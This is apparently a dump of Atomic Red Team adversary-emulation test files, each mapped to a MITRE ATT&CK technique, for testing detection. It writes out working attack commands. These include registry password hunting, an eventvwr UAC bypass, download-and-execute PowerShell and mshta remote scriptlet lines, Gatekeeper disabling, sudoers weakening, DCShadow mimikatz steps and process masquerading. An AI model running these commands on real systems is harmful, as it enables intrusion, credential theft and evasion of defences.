5 | [DefaultInstall]
6 | RunPreSetupCommands=RunPreSetupCommandsSection
7 | ;CopyFiles=Xnstall.CopyFiles, Xnstall.CopyFiles.ICM
8 | ;AddReg=Xnstall.AddReg.AllUsers
9 | RegisterOCXs=RegisterOCXSection
10 |
11 | [RunPreSetupCommandsSection]
12 | ; Commands Here will be run Before Setup Begins to install
13 | c:\windows\system32\cmd.exe
14 | taskkill /IM cmstp.exe /F
15 |
16 | [Strings]
17 | ServiceName="MalCorp"
18 | ShortSvcName="malcorp"
19 | DesktopGUID="{BC63D377-66BA-4935-BAD4-DD402D23A85A}"
20 | UninstallAppTitle="MalCorp"
21 | DesktopIcon=""
22 | PhonebookPath=""
23 | BeginPrompt="Do you want to remove MalCorp?"
24 | EndPrompt="Successfully removed MalCorp."
25 | DisplayLCID=1033
26 | CmLCID=1033
27 |
28 |
29 |
30 |
--------------------------------------------------------------------------------
/tests/T1214/T1214.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1214
3 | display_name: Credentials in Registry
4 | tactic: Discovery
5 | description: The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
6 |
7 | atomic_tests:
8 | - name: Enumeration for Credentials in Registry
9 | description: |
10 | Queries to enumerate for credentials in the Registry.
11 |
12 | supported_platforms:
13 | - windows
14 |
15 | executor_cmd:
16 | name: command_prompt
17 | command: |
18 | reg query HKLM /f password /t REG_SZ /s
19 | reg query HKCU /f password /t REG_SZ /s
20 |
--------------------------------------------------------------------------------
/tests/T1134/T1134.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1134
3 | display_name: Access Token Manipulation
4 |
5 | atomic_tests:
6 | - name: Access Token Manipulation
7 | description: |
8 | Creates a process as another user
9 | Requires Administrator Privileges To Execute Test
10 | supported_platforms:
11 | - windows
12 | input_arguments:
13 | target_user:
14 | description: Username To Steal Token From
15 | type: String
16 | default: SYSTEM
17 | executor:
18 | name: powershell
19 | command: |
20 | #list processes by user,
21 |
22 | $owners = @{}
23 | gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
24 | get-process | select processname,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}
25 | #Steal Token
26 | . .\src\T1134.ps1
27 |
--------------------------------------------------------------------------------
/tests/T1057/T1057.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1057
3 | display_name: Process Discovery
4 | tactic: Discovery
5 | description: Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.
6 |
7 | atomic_tests:
8 | - name: Process Discovery - ps
9 | description: |
10 | Utilize ps to identify processes
11 |
12 | supported_platforms:
13 | - macos
14 | - centos
15 | - ubuntu
16 | - linux
17 |
18 | input_arguments:
19 | output_file:
20 | description: path of output file
21 | type: path
22 | default: /tmp/loot.txt
23 |
24 | executor_nix:
25 | name: sh
26 | command: |
27 | ps >> #{output_file}
28 | ps aux >> #{output_file}
29 |
--------------------------------------------------------------------------------
/tests/T1147/T1147.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1147
3 | display_name: Hidden Users
4 | tactic: Defense Evasion
5 | description: Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen.
6 |
7 | atomic_tests:
8 | - name: Hidden Users
9 | description: |
10 | Add a hidden user on MacOS
11 |
12 | supported_platforms:
13 | - macos
14 |
15 | input_arguments:
16 | user_name:
17 | description: username to add
18 | type: string
19 | default: APT
20 |
21 | executor_nix:
22 | name: sh
23 | command: |
24 | sudo dscl . -create /Users/#{user_name} UniqueID 333
25 |
--------------------------------------------------------------------------------
/tests/T1088/T1088.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1088
3 | display_name: Bypass User Account Control
4 |
5 | atomic_tests:
6 | - name: Bypass UAC using Event Viewer
7 | description: |
8 | Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | executable_binary:
15 | description: Binary to execute with UAC Bypass
16 | type: path
17 | default: C:\Windows\System32\cmd.exe
18 |
19 | executor:
20 | name: command_prompt
21 | command: |
22 | reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
23 | cmd.exe -c eventvwr.msc
24 |
--------------------------------------------------------------------------------
/tests/T1090/T1090.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1090
3 | display_name: Connection Proxy
4 |
5 | atomic_tests:
6 | - name: Connection Proxy
7 | description: |
8 | Enable traffic redirection.
9 |
10 | To undo changes made by this test:
11 | unset http_proxy
12 | unset https_proxy
13 |
14 | Note that this test may conflict with pre-existing system configuration.
15 |
16 | supported_platforms:
17 | - macos
18 | - linux
19 |
20 | input_arguments:
21 | proxy_server:
22 | description: Proxy server URL (host:port)
23 | type: url
24 | default: 127.0.0.1:8080
25 |
26 | proxy_scheme:
27 | description: Protocol to proxy (http or https)
28 | type: string
29 | default: http
30 |
31 | executor:
32 | name: sh
33 | command: |
34 | export #{proxy_scheme}_proxy=#{proxy_server}
--------------------------------------------------------------------------------
/tests/T1010/T1010.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1010
3 | display_name: Application Window Discovery
4 |
5 | atomic_tests:
6 | - name: List Process Main Windows - C# .NET
7 | description: |
8 | Compiles and executes C# code to list main window titles associated with each process.
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | input_source_code:
15 | description: Path to source of C# code
16 | type: path
17 | default: C:\AtomicRedTeam\atomics\T1010\src\T1010.cs
18 | output_file_name:
19 | description: Name of output binary
20 | type: string
21 | default: T1010.exe
22 |
23 | executor:
24 | name: command_prompt
25 | command: |
26 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code}
27 | #{output_file_name}
--------------------------------------------------------------------------------
/tests/T1170/T1170.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1170
3 | display_name: Mshta
4 | tactic: Defense Evasion, Execution
5 | description: Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. Adversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility.
6 |
7 | atomic_tests:
8 | - name: Mshta executes VBScript scriptlet remote payload
9 | description: |
10 | Test execution of a remote script using mshta.exe
11 |
12 | supported_platforms:
13 | - windows
14 |
15 | input_arguments:
16 | file_url:
17 | description: location of the payload
18 | type: Url
19 | default: http:///T1170.sct
20 |
21 | executor_cmd:
22 | name: command_prompt
23 | command: |
24 | mshta.exe http:///t1170.sct
25 |
26 |
--------------------------------------------------------------------------------
/tests/T1114/T1114.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1114
3 | display_name: Email Collection
4 | attack_link: https://attack.mitre.org/wiki/Technique/T1114
5 |
6 | atomic_tests:
7 | - name: T1114 Email Collection with PowerShell
8 |
9 | description: |
10 | Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration.
11 |
12 | supported_platforms:
13 | - windows
14 |
15 | executor:
16 | name: command_prompt
17 | command: |
18 | Display email contents in the terminal
19 | PS C:\> .\Get-Inbox.ps1
20 |
21 | Write emails out to a CSV
22 | PS C:\> .\Get-Inbox.ps1 -file "mail.csv"
23 |
24 | Download and Execute
25 | "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Get-Inbox.ps1')"
--------------------------------------------------------------------------------
/tests/T1144/T1144.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1144
3 | display_name: Gatekeeper Bypass
4 | tactic: Defense Evasion
5 | description: In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called com.apple.quarantine. This attribute is read by Apple's Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution.
6 |
7 | atomic_tests:
8 | - name: Gatekeeper Bypass
9 | description: |
10 | Gatekeeper Bypass via command line
11 |
12 | supported_platforms:
13 | - macos
14 |
15 | input_arguments:
16 | app_path:
17 | description: Path to app to be used
18 | type: Path
19 | default: myapp.app
20 |
21 | executor_nix:
22 | name: sh
23 | command: |
24 | sudo xattr -r -d com.apple.quarantine #{app_path}
25 | sudo spctl --master-disable
26 |
--------------------------------------------------------------------------------
/tests/T1153/T1153.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1153
3 | display_name: Source
4 |
5 | atomic_tests:
6 | - name: Execute Script using Source
7 | description: |
8 | Creates a script and executes it using the source command
9 |
10 | supported_platforms:
11 | - macos
12 | - linux
13 |
14 | executor:
15 | name: sh
16 | command: |
17 | sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
18 | chmod +x /tmp/art.sh
19 | source /tmp/art.sh
20 |
21 | - name: Execute Script using Source Alias
22 | description: |
23 | Creates a script and executes it using the source command's dot alias
24 |
25 | supported_platforms:
26 | - macos
27 | - linux
28 |
29 | executor:
30 | name: sh
31 | command: |
32 | sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
33 | chmod +x /tmp/art.sh
34 | . /tmp/art.sh
35 |
36 |
--------------------------------------------------------------------------------
/tests/T1027/T1027.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1027
3 | display_name: Obfuscated Files or Information
4 | tactic: Defense Evasion
5 | description: Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
6 |
7 | atomic_tests:
8 | - name: Obfuscate data
9 | description: |
10 | Creates a base64-encoded data file and decodes it into an executable shell script
11 |
12 | supported_platforms:
13 | - macos
14 | - linux
15 |
16 | executor_nix:
17 | name: sh
18 | command: |
19 | sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat"
20 | cat /tmp/encoded.dat | base64 -d > /tmp/art.sh
21 | chmod +x /tmp/art.sh
22 | /tmp/art.sh
--------------------------------------------------------------------------------
/tests/T1009/T1009.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1009
3 | display_name: Binary Padding
4 | tactic: Defense Evasion
5 | description: Some security tools inspect files with static signatures to determine if they are known malicious. Adversaries may add data to files to increase the size beyond what security tools are capable of handling or to change the file hash to avoid hash-based blacklists.
6 |
7 | atomic_tests:
8 | - name: Pad Evil Binary to Change Hash
9 | description: |
10 | Copies cat to create an "evil binary" and pads it with a zero to change the hash without harming execution
11 |
12 | supported_platforms:
13 | - macos
14 | - linux
15 |
16 | executor_nix:
17 | name: sh
18 | command: |
19 | cp /bin/cat /tmp/evilCat
20 | md5sum /tmp/evilCat
21 | dd if=/dev/zero bs=1 count=1 >> /tmp/evilCat
22 | md5sum /tmp/evilCat
23 | /tmp/evilCat .bash_profile
24 |
25 |
--------------------------------------------------------------------------------
/tests/T1046/T1046.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1046
3 | display_name: Network Service Scanning
4 | tactic: Discovery
5 | description: Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system.
6 |
7 | atomic_tests:
8 | - name: Port Scan
9 | description: |
10 | Scan ports to check for listening ports
11 |
12 | supported_platforms:
13 | - linux
14 | - macos
15 |
16 | executor_nix:
17 | name: sh
18 | command: |
19 | for port in {1..65535};
20 | do
21 | echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ;
22 | done
23 | nmap -sS #{network_range} -p #{port}
24 | telnet #{host} #{port}
25 | nc -nv #{host} #{port}
26 |
--------------------------------------------------------------------------------
/tests/T1086/payloads/mshta.sct:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
10 |
17 |
18 |
19 |
20 |
21 |
22 |
32 |
33 |
34 |
--------------------------------------------------------------------------------
/tests/T1069/T1069.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1069
3 | display_name: Permission Groups Discovery
4 | tactic: Discovery
5 | description: Adversaries may attempt to find local system or domain-level groups and permissions settings.
6 |
7 | atomic_tests:
8 | - name: Enumerate group permissions
9 | description: |
10 | Permission Groups Discovery
11 | Permission Groups Discovery for Windows
12 | Permission Groups Discovery utilizing PowerShell
13 |
14 | supported_platforms:
15 | - macos
16 | - linux
17 | - windows
18 |
19 | executor_nix:
20 | name: sh
21 | command: |
22 | dscacheutil -q group
23 | dscl . -list /Groups
24 | groups
25 |
26 | executor_cmd:
27 | name: command_prompt
28 | command: |
29 | net localgroup
30 | net group /domain
31 |
32 | executor_pwr:
33 | name: powershell
34 | command: |
35 | get-localgroup
36 | get-ADPrinicipalGroupMembership #{user} | select name
--------------------------------------------------------------------------------
/tests/T1082/T1082.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1082
3 | display_name: System Information Discovery
4 | tactic: Discovery
5 | description: An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
6 |
7 | atomic_tests:
8 | - name: Enumerate system information
9 | description: |
10 | Identify System Info
11 |
12 | supported_platforms:
13 | - windows
14 | - linux
15 | - macos
16 |
17 | executor_cmd:
18 | name: command_prompt
19 | command: |
20 | systeminfo /S localhost /FO LIST
21 | reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
22 |
23 | executor_nix:
24 | name: sh
25 | command: |
26 | systemsetup
27 | system_profiler
28 | uname -a >> /tmp/loot.txt
29 | cat /etc/lsb-release >> /tmp/loot.txt
30 | cat /etc/redhat-release >> /tmp/loot.txt
31 | uptime >> /tmp/loot.txt
32 |
--------------------------------------------------------------------------------
/tests/T1160/T1160.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1160
3 | display_name: Launch Daemon
4 |
5 | atomic_tests:
6 | - name: Launch Daemon
7 | description: |
8 | TODO
9 |
10 | supported_platforms:
11 | - macos
12 |
13 |
14 | executor:
15 | name: manual
16 | steps: |
17 | 1. Place the following file (com.example.hello) in /System/Library/LaunchDaemons or /Library/LaunchDaemons
18 | 2.
19 |
20 |
21 |
22 |
23 | Label
24 | com.example.hello
25 | ProgramArguments
26 |
27 | hello
28 | world
29 |
30 | KeepAlive
31 |
32 |
33 |
34 |
--------------------------------------------------------------------------------
/tests/T1135/T1135.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1135
3 | display_name: Network Share Discovery
4 | tactic: Discovery
5 | description: Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network
6 |
7 | atomic_tests:
8 | - name: Network Share Discovery
9 | description: |
10 | Network Share Discovery
11 | Network Share Discovery utilizing the command prompt
12 | Network Share Discovery utilizing PowerShell
13 |
14 | supported_platforms:
15 | - macos
16 | - linux
17 | - windows
18 |
19 | executor_nix:
20 | name: sh
21 | command: |
22 | df -aH
23 | smbutil view -g //#{computer_name}
24 | showmount #{computer_name}
25 |
26 | executor_cmd:
27 | name: command_prompt
28 | command: |
29 | net view \\#{computer_name}
30 |
31 | executor_pwr:
32 | name: powershell
33 | command: |
34 | get-smbshare -Name #{computer_name}
35 |
--------------------------------------------------------------------------------
/tests/T1151/T1151.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1151
3 | display_name: Space After Filename
4 | tactic: Defense Evasion, Execution
5 | description: Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system. For example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute.
6 |
7 | atomic_tests:
8 | - name: Space After Filename
9 | description: |
10 | Space After Filename
11 |
12 | supported_platforms:
13 | - macos
14 |
15 | executor_man:
16 | name: manual
17 | steps: |
18 | 1. echo '#!/bin/bash\necho "print \"hello, world!\"" | /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt
19 |
20 | 2. mv execute.txt "execute.txt "
21 |
22 | 3. ./execute.txt\
23 |
--------------------------------------------------------------------------------
/tests/T1207/T1207.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1207
3 | display_name: DCShadow
4 |
5 | atomic_tests:
6 | - name: DCShadow - Mimikatz
7 | description: |
8 | Utilize Mimikatz DCShadow method to simulate behavior of a Domain Controller
9 |
10 | [DCShadow](https://www.dcshadow.com/)
11 | [Additional Reference](http://www.labofapenetrationtester.com/2018/04/dcshadow.html)
12 |
13 | supported_platforms:
14 | - windows
15 |
16 | input_arguments:
17 | output_file:
18 | description: TODO
19 | type: todo
20 | default: TODO
21 |
22 | executor:
23 | name: manual
24 | steps: |
25 | 1. Start Mimikatz and use !processtoken (and not token::elevate - as it elevates a thread) to escalate to SYSTEM.
26 | 2. Start another mimikatz with DA privileges. This is the instance which registers a DC and is used to "push" the attributes.
27 | 3. lsadump::dcshadow /object:ops-user19$ /attribute:userAccountControl /value:532480
28 | 4. lsadump::dcshadow /push
29 |
--------------------------------------------------------------------------------
/tests/T1119/T1119.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1119
3 | display_name: Automated Collection
4 | tactic: Collection
5 | description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of Scripting to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools
6 |
7 | atomic_tests:
8 | - name: Automated Collection Command Prompt
9 | description: |
10 | Automated Collection
11 |
12 | supported_platforms:
13 | - windows
14 |
15 | executor_cmd:
16 | name: command_prompt
17 | command: |
18 | dir c: /b /s .docx | findstr /e .docx
19 | for /R c: %f in (*.docx) do copy %f c:\temp\
20 |
21 | executor_pwr:
22 | name: powershell
23 | command: |
24 | Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination c:\temp}
25 |
--------------------------------------------------------------------------------
/tests/T1036/T1036.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1036
3 | display_name: Masquerading
4 | tactic: Defense Evasion
5 | description: Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.
6 |
7 | atomic_tests:
8 | - name: Masquerading as process
9 | description: |
10 | Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe.
11 | Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon.
12 |
13 | supported_platforms:
14 | - windows
15 | - linux
16 |
17 | executor_cmd:
18 | name: command_prompt
19 | command: |
20 | cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
21 | cmd.exe /c %SystemRoot%\Temp\lsass.exe
22 |
23 | executor_nix:
24 | name: sh
25 | command: |
26 | cp /bin/sh /tmp/crond
27 | /tmp/crond
28 |
--------------------------------------------------------------------------------
/tests/T1049/T1049.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1049
3 | display_name: System Network Connections Discovery
4 | tactic: Discovery
5 | description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
6 |
7 | atomic_tests:
8 | - name: Enumerate network connections
9 | description: |
10 | Get a listing of network connections
11 | System Network Connections Discovery with PowerShell
12 | System Network Connections Discovery Linux & MacOS
13 |
14 | supported_platforms:
15 | - windows
16 | - linux
17 | - macos
18 |
19 | executor_cmd:
20 | name: command_prompt
21 | command: |
22 | netstat
23 | net use
24 | net sessions
25 |
26 | executor_pwr:
27 | name: powershell
28 | command: |
29 | Get-NetTCPConnection
30 |
31 | executor_nix:
32 | name: sh
33 | command: |
34 | netstat
35 | who -a
36 |
--------------------------------------------------------------------------------
/tests/T1217/T1217.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1217
3 | display_name: Browser Bookmark Discovery
4 |
5 | atomic_tests:
6 | - name: List Mozilla Firefox Bookmark Database Files on Linux
7 | description: |
8 | Searches for Mozilla Firefox's places.sqlite file (on Linux distributions) that contains bookmarks and lists any found instances to a text file.
9 |
10 | supported_platforms:
11 | - linux
12 |
13 | executor:
14 | name: sh
15 | command: |
16 | find / -path "*.mozilla/firefox/*/places.sqlite" -exec echo {} >> /tmp/firefox-bookmarks.txt \;
17 |
18 | - name: List Mozilla Firefox Bookmark Database Files on macOS
19 | description: |
20 | Searches for Mozilla Firefox's places.sqlite file (on macOS) that contains bookmarks and lists any found instances to a text file.
21 |
22 | supported_platforms:
23 | - macos
24 |
25 | executor:
26 | name: sh
27 | command: |
28 | find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {} >> /tmp/firefox-bookmarks.txt \;
29 |
--------------------------------------------------------------------------------
/tests/T1206/T1206.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1206
3 | display_name: Sudo Caching
4 |
5 | atomic_tests:
6 | - name: Unlimited sudo cache timeout
7 | description: |
8 | Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system.
9 |
10 | supported_platforms:
11 | - macos
12 | - linux
13 |
14 | executor:
15 | name: sh
16 | command: |
17 | sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
18 | sudo visudo -c -f /etc/sudoers
19 |
20 | - name: Disable tty_tickets for sudo caching
21 | description: |
22 | Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system.
23 |
24 | supported_platforms:
25 | - macos
26 | - linux
27 |
28 | executor:
29 | name: sh
30 | command: |
31 | sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers"
32 | sudo visudo -c -f /etc/sudoers
33 |
--------------------------------------------------------------------------------
/tests/T1179/src/T1179/T1179.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/tests/T1016/T1016.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1016
3 | display_name: System Network Configuration Discovery
4 | tactic: Discovery
5 | description: Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp, ipconfig/ifconfig, nbtstat, and route.
6 |
7 | atomic_tests:
8 | - name: Enumerate network configuration
9 | description: |
10 | Identify network configuration information
11 |
12 | supported_platforms:
13 | - windows
14 | - linux
15 | - macos
16 |
17 | executor_cmd:
18 | name: command_prompt
19 | command: |
20 | ipconfig /all
21 | netsh interface show
22 | arp -a
23 | nbtstat -n
24 | net config workstation
25 |
26 | executor_nix:
27 | name: sh
28 | command: |
29 | arp -a
30 | netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c
31 | ifconfig
--------------------------------------------------------------------------------
/tests/T1156/T1156.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1156
3 | display_name: .bash_profile and .bashrc
4 | tactic: Persistence
5 | description: ~/.bash_profile and ~/.bashrc are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. ~/.bash_profile is executed for login shells and ~/.bashrc is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), ~/.bash_profile is executed before the initial command prompt is returned to the user.
6 |
7 | atomic_tests:
8 | - name: .bash_profile and .bashrc
9 | description: |
10 | xxx
11 |
12 | supported_platforms:
13 | - macos
14 | - linux
15 |
16 | input_arguments:
17 | script:
18 | description: path to script
19 | type: path
20 | default: /path/to/script.py
21 |
22 | executor_nix:
23 | name: sh
24 | command: |
25 | echo "#{script}" >> ~/.bash_profile
26 | echo "#{script}" >> ~/.bashrc
27 |
--------------------------------------------------------------------------------
/tests/T1047/T1047.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1047
3 | display_name: Windows Management Instrumentation
4 | tactic: Execution
5 | description: Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access.
6 |
7 | atomic_tests:
8 | - name: WMI recon users, processes, software
9 |
10 | description: |
11 | WMI List User Accounts
12 | WMI Reconnaissance Processes
13 | WMI Reconnaissance Updates
14 | WMI Reconnaissance List Remote Services
15 |
16 | supported_platforms:
17 | - windows
18 |
19 | executor_cmd:
20 | name: command_prompt
21 | command: |
22 | wmic #{useraccount get /ALL}
23 | wmic process get caption,executablepath,commandline
24 | wmic qfe get description,installedOn /format:csv
25 | wmic service where (caption like "%bit9%")
26 |
27 |
--------------------------------------------------------------------------------
/tests/T1191/T1191.sct:
--------------------------------------------------------------------------------
1 |
2 |
3 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
22 |
23 |
24 |
--------------------------------------------------------------------------------
/tests/T1117/RegSvr32.sct:
--------------------------------------------------------------------------------
1 |
2 |
3 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
22 |
23 |
24 |
--------------------------------------------------------------------------------
/tests/T1124/T1124.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1124
3 | display_name: System Time Discovery
4 | tactic: Discovery
5 | description: The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. An adversary may gather the system time and/or time zone from a local or remote system. This information may be gathered in a number of ways, such as with Net on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz.
6 |
7 | atomic_tests:
8 | - name: Enumerate system time
9 | description: |
10 | Identify the system time
11 | Identify the system time via PowerShell
12 |
13 | supported_platforms:
14 | - windows
15 |
16 | executor_cmd:
17 | name: command_prompt
18 | command: |
19 | net time \\localhost
20 | w32tm /tz
21 |
22 | executor_pwr:
23 | name: powershell
24 | command: |
25 | Get-Date
26 |
--------------------------------------------------------------------------------
/tests/T1018/T1018.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1018
3 | display_name: Remote System Discovery
4 | tactic: Discovery
5 | description: Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used.
6 |
7 | atomic_tests:
8 | - name: Enumerate remote systems
9 | description: |
10 | Identify remote systems
11 |
12 | supported_platforms:
13 | - windows
14 | - linux
15 | - macos
16 |
17 | executor_cmd:
18 | name: command_prompt
19 | command: |
20 | net view /domain
21 | net view
22 | for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
23 | arp -a
24 |
25 | executor_nix:
26 | name: sh
27 | command: |
28 | arp -a | grep -v '^?'
29 | for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip -o; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
30 |
--------------------------------------------------------------------------------
/tests/T1053/T1053.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1053
3 | display_name: Scheduled Task
4 | tactic: Execution, Persistence, Privilege Escalation
5 | description: Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically required being a member of the Administrators group on the the remote system.
6 |
7 | atomic_tests:
8 | - name: Scheduled tasks
9 | description: |
10 | Scheduled task Local
11 | Scheduled task Remote
12 |
13 | supported_platforms:
14 | - windows
15 |
16 | executor_cmd:
17 | name: command_prompt
18 | command: |
19 | at #{13:20 /interactive cmd}
20 | SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
21 | SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
22 |
--------------------------------------------------------------------------------
/tests/T1191/T1191.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1191
3 | display_name: CMSTP
4 |
5 | atomic_tests:
6 | - name: CMSTP Executing Remote Scriptlet
7 | description: |
8 | Adversaries may supply CMSTP.exe with INF files infected with malicious commands
9 |
10 | supported_platforms:
11 | - windows
12 | input_arguments:
13 | inf_file_path:
14 | description: Path to the INF file
15 | type: path
16 | default: T1191.inf
17 |
18 | executor:
19 | name: command_prompt
20 | command: |
21 | cmstp.exe /s #{inf_file_path}
22 |
23 | - name: CMSTP Executing UAC Bypass
24 | description: |
25 | Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file
26 |
27 | supported_platforms:
28 | - windows
29 |
30 | input_arguments:
31 | inf_file_uac:
32 | description: Path to the INF file
33 | type: path
34 | default: T1191_uacbypass.inf
35 |
36 | executor:
37 | name: command_prompt
38 | command: |
39 | cmstp.exe /s #{inf_file_uac} /au
40 |
--------------------------------------------------------------------------------
/tests/T1098/T1098.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1098
